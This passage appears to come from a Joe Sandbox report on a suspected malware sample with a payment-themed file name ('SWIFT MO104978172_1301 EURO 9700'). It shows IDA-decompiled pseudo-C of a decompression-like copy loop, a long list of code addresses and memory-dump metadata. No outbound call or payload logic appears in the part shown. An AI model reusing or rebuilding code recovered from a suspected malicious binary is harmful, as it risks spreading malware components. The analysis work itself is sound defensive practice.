                                                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                  												 *( *(__ebp - 0x68)) = __al;
                                                                                  												__ecx =  *(__ebp - 0x14);
                                                                                  												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                  												__eax = __ecx + 1;
                                                                                  												__edx = 0;
                                                                                  												_t192 = __eax %  *(__ebp - 0x74);
                                                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                                                  												__edx = _t192;
                                                                                  												goto L80;
                                                                                  											case 0x1b:
                                                                                  												L76:
                                                                                  												__eflags =  *(__ebp - 0x64);
                                                                                  												if( *(__ebp - 0x64) == 0) {
                                                                                  													 *(__ebp - 0x88) = 0x1b;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												__eax =  *(__ebp - 0x14);
                                                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                                                  													__eflags = __eax;
                                                                                  												}
                                                                                  												__edx =  *(__ebp - 8);
                                                                                  												__cl =  *(__eax + __edx);
                                                                                  												__eax =  *(__ebp - 0x14);
                                                                                  												 *(__ebp - 0x5c) = __cl;
                                                                                  												 *(__eax + __edx) = __cl;
                                                                                  												__eax = __eax + 1;
                                                                                  												__edx = 0;
                                                                                  												_t275 = __eax %  *(__ebp - 0x74);
                                                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                                                  												__edx = _t275;
                                                                                  												__eax =  *(__ebp - 0x68);
                                                                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                  												_t284 = __ebp - 0x64;
                                                                                  												 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                  												__eflags =  *_t284;
                                                                                  												 *( *(__ebp - 0x68)) = __cl;
                                                                                  												L80:
                                                                                  												 *(__ebp - 0x14) = __edx;
                                                                                  												goto L81;
                                                                                  											case 0x1c:
                                                                                  												while(1) {
                                                                                  													L123:
                                                                                  													__eflags =  *(__ebp - 0x64);
                                                                                  													if( *(__ebp - 0x64) == 0) {
                                                                                  														break;
                                                                                  													}
                                                                                  													__eax =  *(__ebp - 0x14);
                                                                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                  													__eflags = __eax -  *(__ebp - 0x74);
                                                                                  													if(__eax >=  *(__ebp - 0x74)) {
                                                                                  														__eax = __eax +  *(__ebp - 0x74);
                                                                                  														__eflags = __eax;
                                                                                  													}
                                                                                  													__edx =  *(__ebp - 8);
                                                                                  													__cl =  *(__eax + __edx);
                                                                                  													__eax =  *(__ebp - 0x14);
                                                                                  													 *(__ebp - 0x5c) = __cl;
                                                                                  													 *(__eax + __edx) = __cl;
                                                                                  													__eax = __eax + 1;
                                                                                  													__edx = 0;
                                                                                  													_t414 = __eax %  *(__ebp - 0x74);
                                                                                  													__eax = __eax /  *(__ebp - 0x74);
                                                                                  													__edx = _t414;
                                                                                  													__eax =  *(__ebp - 0x68);
                                                                                  													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                  													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                  													__eflags =  *(__ebp - 0x30);
                                                                                  													 *( *(__ebp - 0x68)) = __cl;
                                                                                  													 *(__ebp - 0x14) = _t414;
                                                                                  													if( *(__ebp - 0x30) > 0) {
                                                                                  														continue;
                                                                                  													} else {
                                                                                  														L81:
                                                                                  														 *(__ebp - 0x88) = 2;
                                                                                  														goto L1;
                                                                                  													}
                                                                                  												}
                                                                                  												 *(__ebp - 0x88) = 0x1c;
                                                                                  												goto L170;
                                                                                  										}
                                                                                  									}
                                                                                  									L171:
                                                                                  									_t535 = _t534 | 0xffffffff;
                                                                                  									goto L172;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					goto L1;
                                                                                  				}
                                                                                  			}













                                                                                  0x00000000
                                                                                  0x0040711c
                                                                                  0x0040711c
                                                                                  0x00407120
                                                                                  0x0040712d
                                                                                  0x00407137
                                                                                  0x00000000
                                                                                  0x00407122
                                                                                  0x00407122
                                                                                  0x0040715d
                                                                                  0x00407160
                                                                                  0x00407163
                                                                                  0x00407166
                                                                                  0x00407166
                                                                                  0x00407169
                                                                                  0x00407170
                                                                                  0x00407175
                                                                                  0x00407056
                                                                                  0x00407059
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x004073ce
                                                                                  0x004073ce
                                                                                  0x004073ce
                                                                                  0x004073d4
                                                                                  0x004073da
                                                                                  0x004073e0
                                                                                  0x004073fa
                                                                                  0x004073fd
                                                                                  0x00407403
                                                                                  0x0040740e
                                                                                  0x00407410
                                                                                  0x004073e2
                                                                                  0x004073e2
                                                                                  0x004073f1
                                                                                  0x004073f5
                                                                                  0x004073f5
                                                                                  0x0040741a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040741c
                                                                                  0x00407420
                                                                                  0x004075cf
                                                                                  0x004075e5
                                                                                  0x004075ed
                                                                                  0x004075f4
                                                                                  0x004075f6
                                                                                  0x004075fd
                                                                                  0x00407601
                                                                                  0x00407601
                                                                                  0x0040742c
                                                                                  0x00407433
                                                                                  0x0040743b
                                                                                  0x0040743e
                                                                                  0x00407441
                                                                                  0x00407441
                                                                                  0x00407447
                                                                                  0x00407447
                                                                                  0x00406be3
                                                                                  0x00406be3
                                                                                  0x00406be3
                                                                                  0x00406bec
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406bf2
                                                                                  0x00000000
                                                                                  0x00406bfd
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c06
                                                                                  0x00406c09
                                                                                  0x00406c0c
                                                                                  0x00406c10
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c16
                                                                                  0x00406c19
                                                                                  0x00406c1b
                                                                                  0x00406c1c
                                                                                  0x00406c1f
                                                                                  0x00406c21
                                                                                  0x00406c22
                                                                                  0x00406c24
                                                                                  0x00406c27
                                                                                  0x00406c2c
                                                                                  0x00406c31
                                                                                  0x00406c3a
                                                                                  0x00406c4d
                                                                                  0x00406c50
                                                                                  0x00406c5c
                                                                                  0x00406c84
                                                                                  0x00406c86
                                                                                  0x00406c94
                                                                                  0x00406c94
                                                                                  0x00406c98
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c88
                                                                                  0x00406c88
                                                                                  0x00406c8b
                                                                                  0x00406c8c
                                                                                  0x00406c8c
                                                                                  0x00000000
                                                                                  0x00406c88
                                                                                  0x00406c62
                                                                                  0x00406c67
                                                                                  0x00406c67
                                                                                  0x00406c70
                                                                                  0x00406c78
                                                                                  0x00406c7b
                                                                                  0x00000000
                                                                                  0x00406c81
                                                                                  0x00406c81
                                                                                  0x00000000
                                                                                  0x00406c81
                                                                                  0x00000000
                                                                                  0x00406c9e
                                                                                  0x00406c9e
                                                                                  0x00406ca2
                                                                                  0x0040754e
                                                                                  0x00000000
                                                                                  0x0040754e
                                                                                  0x00406cab
                                                                                  0x00406cbb
                                                                                  0x00406cbe
                                                                                  0x00406cc1
                                                                                  0x00406cc1
                                                                                  0x00406cc1
                                                                                  0x00406cc4
                                                                                  0x00406cc8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406cca
                                                                                  0x00406cd0
                                                                                  0x00406cfa
                                                                                  0x00406d00
                                                                                  0x00406d07
                                                                                  0x00000000
                                                                                  0x00406d07
                                                                                  0x00406cd6
                                                                                  0x00406cd9
                                                                                  0x00406cde
                                                                                  0x00406cde
                                                                                  0x00406ce9
                                                                                  0x00406cf1
                                                                                  0x00406cf4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d39
                                                                                  0x00406d3f
                                                                                  0x00406d42
                                                                                  0x00406d4f
                                                                                  0x00406d57
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d0e
                                                                                  0x00406d0e
                                                                                  0x00406d12
                                                                                  0x0040755d
                                                                                  0x00000000
                                                                                  0x0040755d
                                                                                  0x00406d1e
                                                                                  0x00406d29
                                                                                  0x00406d29
                                                                                  0x00406d29
                                                                                  0x00406d2c
                                                                                  0x00406d2f
                                                                                  0x00406d32
                                                                                  0x00406d37
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004073ce
                                                                                  0x004073ce
                                                                                  0x004073d4
                                                                                  0x004073da
                                                                                  0x004073e0
                                                                                  0x004073fa
                                                                                  0x004073fd
                                                                                  0x00407403
                                                                                  0x0040740e
                                                                                  0x00407410
                                                                                  0x004073e2
                                                                                  0x004073e2
                                                                                  0x004073f1
                                                                                  0x004073f5
                                                                                  0x004073f5
                                                                                  0x0040741a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d5f
                                                                                  0x00406d61
                                                                                  0x00406d64
                                                                                  0x00406dd5
                                                                                  0x00406dd8
                                                                                  0x00406ddb
                                                                                  0x00406de2
                                                                                  0x00406dec
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x00406d66
                                                                                  0x00406d6a
                                                                                  0x00406d6d
                                                                                  0x00406d6f
                                                                                  0x00406d72
                                                                                  0x00406d75
                                                                                  0x00406d77
                                                                                  0x00406d7a
                                                                                  0x00406d7c
                                                                                  0x00406d81
                                                                                  0x00406d84
                                                                                  0x00406d87
                                                                                  0x00406d8b
                                                                                  0x00406d92
                                                                                  0x00406d95
                                                                                  0x00406d9c
                                                                                  0x00406da0
                                                                                  0x00406da8
                                                                                  0x00406da8
                                                                                  0x00406da8
                                                                                  0x00406da2
                                                                                  0x00406da2
                                                                                  0x00406da2
                                                                                  0x00406d97
                                                                                  0x00406d97
                                                                                  0x00406d97
                                                                                  0x00406dac
                                                                                  0x00406daf
                                                                                  0x00406dcd
                                                                                  0x00406dcf
                                                                                  0x00000000
                                                                                  0x00406db1
                                                                                  0x00406db1
                                                                                  0x00406db4
                                                                                  0x00406db7
                                                                                  0x00406dba
                                                                                  0x00406dbc
                                                                                  0x00406dbc
                                                                                  0x00406dbc
                                                                                  0x00406dbf
                                                                                  0x00406dc2
                                                                                  0x00406dc4
                                                                                  0x00406dc5
                                                                                  0x00406dc8
                                                                                  0x00000000
                                                                                  0x00406dc8
                                                                                  0x00000000
                                                                                  0x00406ffe
                                                                                  0x00407002
                                                                                  0x00407020
                                                                                  0x00407023
                                                                                  0x0040702a
                                                                                  0x0040702d
                                                                                  0x00407030
                                                                                  0x00407033
                                                                                  0x00407036
                                                                                  0x00407039
                                                                                  0x0040703b
                                                                                  0x00407042
                                                                                  0x00407043
                                                                                  0x00407045
                                                                                  0x00407048
                                                                                  0x0040704b
                                                                                  0x0040704e
                                                                                  0x0040704e
                                                                                  0x00407053
                                                                                  0x00000000
                                                                                  0x00407053
                                                                                  0x00407004
                                                                                  0x00407007
                                                                                  0x0040700a
                                                                                  0x00407014
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x00407068
                                                                                  0x0040706c
                                                                                  0x0040708f
                                                                                  0x00407092
                                                                                  0x00407095
                                                                                  0x0040709f
                                                                                  0x0040706e
                                                                                  0x0040706e
                                                                                  0x00407071
                                                                                  0x00407074
                                                                                  0x00407077
                                                                                  0x00407084
                                                                                  0x00407087
                                                                                  0x00407087
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x004070ab
                                                                                  0x004070af
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070b5
                                                                                  0x004070b9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070bf
                                                                                  0x004070c1
                                                                                  0x004070c5
                                                                                  0x004070c5
                                                                                  0x004070c8
                                                                                  0x004070cc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407143
                                                                                  0x00407147
                                                                                  0x0040714e
                                                                                  0x00407151
                                                                                  0x00407154
                                                                                  0x00407149
                                                                                  0x00407149
                                                                                  0x00407149
                                                                                  0x00407157
                                                                                  0x0040715a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407203
                                                                                  0x00407203
                                                                                  0x00407207
                                                                                  0x004075a5
                                                                                  0x00000000
                                                                                  0x004075a5
                                                                                  0x0040720d
                                                                                  0x00407210
                                                                                  0x00407213
                                                                                  0x00407217
                                                                                  0x0040721a
                                                                                  0x00407220
                                                                                  0x00407222
                                                                                  0x00407222
                                                                                  0x00407222
                                                                                  0x00407225
                                                                                  0x00407228
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406df8
                                                                                  0x00406df8
                                                                                  0x00406dfc
                                                                                  0x00407569
                                                                                  0x00000000
                                                                                  0x00407569
                                                                                  0x00406e02
                                                                                  0x00406e05
                                                                                  0x00406e08
                                                                                  0x00406e0c
                                                                                  0x00406e0f
                                                                                  0x00406e15
                                                                                  0x00406e17
                                                                                  0x00406e17
                                                                                  0x00406e17
                                                                                  0x00406e1a
                                                                                  0x00406e1d
                                                                                  0x00406e1d
                                                                                  0x00406e20
                                                                                  0x00406e23
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406e29
                                                                                  0x00406e2f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406e35
                                                                                  0x00406e35
                                                                                  0x00406e39
                                                                                  0x00406e3c
                                                                                  0x00406e3f
                                                                                  0x00406e42
                                                                                  0x00406e45
                                                                                  0x00406e46
                                                                                  0x00406e49
                                                                                  0x00406e4b
                                                                                  0x00406e51
                                                                                  0x00406e54
                                                                                  0x00406e57
                                                                                  0x00406e5a
                                                                                  0x00406e5d
                                                                                  0x00406e60
                                                                                  0x00406e63
                                                                                  0x00406e7f
                                                                                  0x00406e82
                                                                                  0x00406e85
                                                                                  0x00406e88
                                                                                  0x00406e8f
                                                                                  0x00406e93
                                                                                  0x00406e95
                                                                                  0x00406e99
                                                                                  0x00406e65
                                                                                  0x00406e65
                                                                                  0x00406e69
                                                                                  0x00406e71
                                                                                  0x00406e76
                                                                                  0x00406e78
                                                                                  0x00406e7a
                                                                                  0x00406e7a
                                                                                  0x00406e9c
                                                                                  0x00406ea3
                                                                                  0x00406ea6
                                                                                  0x00000000
                                                                                  0x00406eac
                                                                                  0x00000000
                                                                                  0x00406eac
                                                                                  0x00000000
                                                                                  0x00406eb1
                                                                                  0x00406eb1
                                                                                  0x00406eb5
                                                                                  0x00407575
                                                                                  0x00000000
                                                                                  0x00407575
                                                                                  0x00406ebb
                                                                                  0x00406ebe
                                                                                  0x00406ec1
                                                                                  0x00406ec5
                                                                                  0x00406ec8
                                                                                  0x00406ece
                                                                                  0x00406ed0
                                                                                  0x00406ed0
                                                                                  0x00406ed0
                                                                                  0x00406ed3
                                                                                  0x00406ed6
                                                                                  0x00406ed6
                                                                                  0x00406ed6
                                                                                  0x00406edc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406ede
                                                                                  0x00406ee1
                                                                                  0x00406ee4
                                                                                  0x00406ee7
                                                                                  0x00406eea
                                                                                  0x00406eed
                                                                                  0x00406ef0
                                                                                  0x00406ef3
                                                                                  0x00406ef6
                                                                                  0x00406ef9
                                                                                  0x00406efc
                                                                                  0x00406f14
                                                                                  0x00406f17
                                                                                  0x00406f1a
                                                                                  0x00406f1d
                                                                                  0x00406f1d
                                                                                  0x00406f20
                                                                                  0x00406f24
                                                                                  0x00406f26
                                                                                  0x00406efe
                                                                                  0x00406efe
                                                                                  0x00406f06
                                                                                  0x00406f0b
                                                                                  0x00406f0d
                                                                                  0x00406f0f
                                                                                  0x00406f0f
                                                                                  0x00406f29
                                                                                  0x00406f30
                                                                                  0x00406f33
                                                                                  0x00000000
                                                                                  0x00406f35
                                                                                  0x00000000
                                                                                  0x00406f35
                                                                                  0x00406f33
                                                                                  0x00406f3a
                                                                                  0x00406f3a
                                                                                  0x00406f3a
                                                                                  0x00406f3a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406f75
                                                                                  0x00406f75
                                                                                  0x00406f79
                                                                                  0x00407581
                                                                                  0x00000000
                                                                                  0x00407581
                                                                                  0x00406f7f
                                                                                  0x00406f82
                                                                                  0x00406f85
                                                                                  0x00406f89
                                                                                  0x00406f8c
                                                                                  0x00406f92
                                                                                  0x00406f94
                                                                                  0x00406f94
                                                                                  0x00406f94
                                                                                  0x00406f97
                                                                                  0x00406f9a
                                                                                  0x00406f9a
                                                                                  0x00406fa0
                                                                                  0x00406f3e
                                                                                  0x00406f3e
                                                                                  0x00406f41
                                                                                  0x00000000
                                                                                  0x00406f41
                                                                                  0x00406fa2
                                                                                  0x00406fa2
                                                                                  0x00406fa5
                                                                                  0x00406fa8
                                                                                  0x00406fab
                                                                                  0x00406fae
                                                                                  0x00406fb1
                                                                                  0x00406fb4
                                                                                  0x00406fb7
                                                                                  0x00406fba
                                                                                  0x00406fbd
                                                                                  0x00406fc0
                                                                                  0x00406fd8
                                                                                  0x00406fdb
                                                                                  0x00406fde
                                                                                  0x00406fe1
                                                                                  0x00406fe1
                                                                                  0x00406fe4
                                                                                  0x00406fe8
                                                                                  0x00406fea
                                                                                  0x00406fc2
                                                                                  0x00406fc2
                                                                                  0x00406fca
                                                                                  0x00406fcf
                                                                                  0x00406fd1
                                                                                  0x00406fd3
                                                                                  0x00406fd3
                                                                                  0x00406fed
                                                                                  0x00406ff4
                                                                                  0x00406ff7
                                                                                  0x00000000
                                                                                  0x00406ff9
                                                                                  0x00000000
                                                                                  0x00406ff9
                                                                                  0x00000000
                                                                                  0x00407286
                                                                                  0x00407286
                                                                                  0x0040728a
                                                                                  0x004075b1
                                                                                  0x00000000
                                                                                  0x004075b1
                                                                                  0x00407290
                                                                                  0x00407293
                                                                                  0x00407296
                                                                                  0x0040729a
                                                                                  0x0040729d
                                                                                  0x004072a3
                                                                                  0x004072a5
                                                                                  0x004072a5
                                                                                  0x004072a5
                                                                                  0x004072a8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407395
                                                                                  0x00407399
                                                                                  0x004073bb
                                                                                  0x004073be
                                                                                  0x004073c8
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x0040739b
                                                                                  0x0040739e
                                                                                  0x004073a2
                                                                                  0x004073a5
                                                                                  0x004073a5
                                                                                  0x004073a8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407452
                                                                                  0x00407456
                                                                                  0x00407474
                                                                                  0x00407474
                                                                                  0x00407474
                                                                                  0x0040747b
                                                                                  0x00407482
                                                                                  0x00407489
                                                                                  0x00407489
                                                                                  0x00000000
                                                                                  0x00407489
                                                                                  0x00407458
                                                                                  0x0040745b
                                                                                  0x0040745e
                                                                                  0x00407461
                                                                                  0x00407468
                                                                                  0x004073ac
                                                                                  0x004073ac
                                                                                  0x004073af
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407543
                                                                                  0x00407546
                                                                                  0x00407447
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040717d
                                                                                  0x0040717f
                                                                                  0x00407186
                                                                                  0x00407187
                                                                                  0x00407189
                                                                                  0x0040718c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407194
                                                                                  0x00407197
                                                                                  0x0040719a
                                                                                  0x0040719c
                                                                                  0x0040719e
                                                                                  0x0040719e
                                                                                  0x0040719f
                                                                                  0x004071a2
                                                                                  0x004071a9
                                                                                  0x004071ac
                                                                                  0x004071ba
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407490
                                                                                  0x00407490
                                                                                  0x00407493
                                                                                  0x0040749a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040749f
                                                                                  0x0040749f
                                                                                  0x004074a3
                                                                                  0x004075db
                                                                                  0x00000000
                                                                                  0x004075db
                                                                                  0x004074a9
                                                                                  0x004074ac
                                                                                  0x004074af
                                                                                  0x004074b3
                                                                                  0x004074b6
                                                                                  0x004074bc
                                                                                  0x004074be
                                                                                  0x004074be
                                                                                  0x004074be
                                                                                  0x004074c1
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c7
                                                                                  0x004074c7
                                                                                  0x004074cb
                                                                                  0x0040752b
                                                                                  0x0040752e
                                                                                  0x00407533
                                                                                  0x00407534
                                                                                  0x00407536
                                                                                  0x00407538
                                                                                  0x0040753b
                                                                                  0x00407447
                                                                                  0x00407447
                                                                                  0x00000000
                                                                                  0x0040744d
                                                                                  0x00407447
                                                                                  0x004074cd
                                                                                  0x004074d3
                                                                                  0x004074d6
                                                                                  0x004074d9
                                                                                  0x004074dc
                                                                                  0x004074df
                                                                                  0x004074e2
                                                                                  0x004074e5
                                                                                  0x004074e8
                                                                                  0x004074eb
                                                                                  0x004074ee
                                                                                  0x00407507
                                                                                  0x0040750a
                                                                                  0x0040750d
                                                                                  0x00407510
                                                                                  0x00407514
                                                                                  0x00407516
                                                                                  0x00407516
                                                                                  0x00407517
                                                                                  0x0040751a
                                                                                  0x004074f0
                                                                                  0x004074f0
                                                                                  0x004074f8
                                                                                  0x004074fd
                                                                                  0x004074ff
                                                                                  0x00407502
                                                                                  0x00407502
                                                                                  0x0040751d
                                                                                  0x00407524
                                                                                  0x00000000
                                                                                  0x00407526
                                                                                  0x00000000
                                                                                  0x00407526
                                                                                  0x00000000
                                                                                  0x004071c2
                                                                                  0x004071c5
                                                                                  0x004071fb
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732e
                                                                                  0x0040732e
                                                                                  0x00407331
                                                                                  0x00407333
                                                                                  0x004075bd
                                                                                  0x00000000
                                                                                  0x004075bd
                                                                                  0x00407339
                                                                                  0x0040733c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407342
                                                                                  0x00407346
                                                                                  0x00407349
                                                                                  0x00407349
                                                                                  0x00407349
                                                                                  0x00000000
                                                                                  0x00407349
                                                                                  0x004071c7
                                                                                  0x004071c9
                                                                                  0x004071cb
                                                                                  0x004071cd
                                                                                  0x004071d0
                                                                                  0x004071d1
                                                                                  0x004071d3
                                                                                  0x004071d5
                                                                                  0x004071d8
                                                                                  0x004071db
                                                                                  0x004071f1
                                                                                  0x004071f6
                                                                                  0x0040722e
                                                                                  0x0040722e
                                                                                  0x00407232
                                                                                  0x0040725e
                                                                                  0x00407260
                                                                                  0x00407267
                                                                                  0x0040726a
                                                                                  0x0040726d
                                                                                  0x0040726d
                                                                                  0x00407272
                                                                                  0x00407272
                                                                                  0x00407274
                                                                                  0x00407277
                                                                                  0x0040727e
                                                                                  0x00407281
                                                                                  0x004072ae
                                                                                  0x004072ae
                                                                                  0x004072b1
                                                                                  0x004072b4
                                                                                  0x00407328
                                                                                  0x00407328
                                                                                  0x00407328
                                                                                  0x00000000
                                                                                  0x00407328
                                                                                  0x004072b6
                                                                                  0x004072bc
                                                                                  0x004072bf
                                                                                  0x004072c2
                                                                                  0x004072c5
                                                                                  0x004072c8
                                                                                  0x004072cb
                                                                                  0x004072ce
                                                                                  0x004072d1
                                                                                  0x004072d4
                                                                                  0x004072d7
                                                                                  0x004072f0
                                                                                  0x004072f2
                                                                                  0x004072f5
                                                                                  0x004072f6
                                                                                  0x004072f9
                                                                                  0x004072fb
                                                                                  0x004072fe
                                                                                  0x00407300
                                                                                  0x00407302
                                                                                  0x00407305
                                                                                  0x00407307
                                                                                  0x0040730a
                                                                                  0x0040730e
                                                                                  0x00407310
                                                                                  0x00407310
                                                                                  0x00407311
                                                                                  0x00407314
                                                                                  0x00407317
                                                                                  0x004072d9
                                                                                  0x004072d9
                                                                                  0x004072e1
                                                                                  0x004072e6
                                                                                  0x004072e8
                                                                                  0x004072eb
                                                                                  0x004072eb
                                                                                  0x0040731a
                                                                                  0x00407321
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x00000000
                                                                                  0x00407323
                                                                                  0x00000000
                                                                                  0x00407323
                                                                                  0x00407321
                                                                                  0x00407234
                                                                                  0x00407237
                                                                                  0x00407239
                                                                                  0x0040723c
                                                                                  0x0040723f
                                                                                  0x00407242
                                                                                  0x00407244
                                                                                  0x00407247
                                                                                  0x0040724a
                                                                                  0x0040724a
                                                                                  0x0040724d
                                                                                  0x0040724d
                                                                                  0x00407250
                                                                                  0x00407257
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x00000000
                                                                                  0x00407259
                                                                                  0x00000000
                                                                                  0x00407259
                                                                                  0x00407257
                                                                                  0x004071dd
                                                                                  0x004071e0
                                                                                  0x004071e2
                                                                                  0x004071e5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406f44
                                                                                  0x00406f44
                                                                                  0x00406f48
                                                                                  0x0040758d
                                                                                  0x00000000
                                                                                  0x0040758d
                                                                                  0x00406f4e
                                                                                  0x00406f51
                                                                                  0x00406f54
                                                                                  0x00406f57
                                                                                  0x00406f5a
                                                                                  0x00406f5d
                                                                                  0x00406f60
                                                                                  0x00406f62
                                                                                  0x00406f65
                                                                                  0x00406f68
                                                                                  0x00406f6b
                                                                                  0x00406f6d
                                                                                  0x00406f6d
                                                                                  0x00406f6d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070cf
                                                                                  0x004070cf
                                                                                  0x004070d3
                                                                                  0x00407599
                                                                                  0x00000000
                                                                                  0x00407599
                                                                                  0x004070d9
                                                                                  0x004070dc
                                                                                  0x004070df
                                                                                  0x004070e2
                                                                                  0x004070e4
                                                                                  0x004070e4
                                                                                  0x004070e4
                                                                                  0x004070e7
                                                                                  0x004070ea
                                                                                  0x004070ed
                                                                                  0x004070f0
                                                                                  0x004070f3
                                                                                  0x004070f6
                                                                                  0x004070f7
                                                                                  0x004070f9
                                                                                  0x004070f9
                                                                                  0x004070f9
                                                                                  0x004070fc
                                                                                  0x004070ff
                                                                                  0x00407102
                                                                                  0x00407105
                                                                                  0x00407105
                                                                                  0x00407105
                                                                                  0x00407108
                                                                                  0x0040710a
                                                                                  0x0040710a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040734c
                                                                                  0x0040734c
                                                                                  0x0040734c
                                                                                  0x00407350
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407356
                                                                                  0x00407359
                                                                                  0x0040735c
                                                                                  0x0040735f
                                                                                  0x00407361
                                                                                  0x00407361
                                                                                  0x00407361
                                                                                  0x00407364
                                                                                  0x00407367
                                                                                  0x0040736a
                                                                                  0x0040736d
                                                                                  0x00407370
                                                                                  0x00407373
                                                                                  0x00407374
                                                                                  0x00407376
                                                                                  0x00407376
                                                                                  0x00407376
                                                                                  0x00407379
                                                                                  0x0040737c
                                                                                  0x0040737f
                                                                                  0x00407382
                                                                                  0x00407385
                                                                                  0x00407389
                                                                                  0x0040738b
                                                                                  0x0040738e
                                                                                  0x00000000
                                                                                  0x00407390
                                                                                  0x0040710d
                                                                                  0x0040710d
                                                                                  0x00000000
                                                                                  0x0040710d
                                                                                  0x0040738e
                                                                                  0x004075c3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406bf2
                                                                                  0x004075fa
                                                                                  0x004075fa
                                                                                  0x00000000
                                                                                  0x004075fa
                                                                                  0x00407447
                                                                                  0x004073ce
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x00407120

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
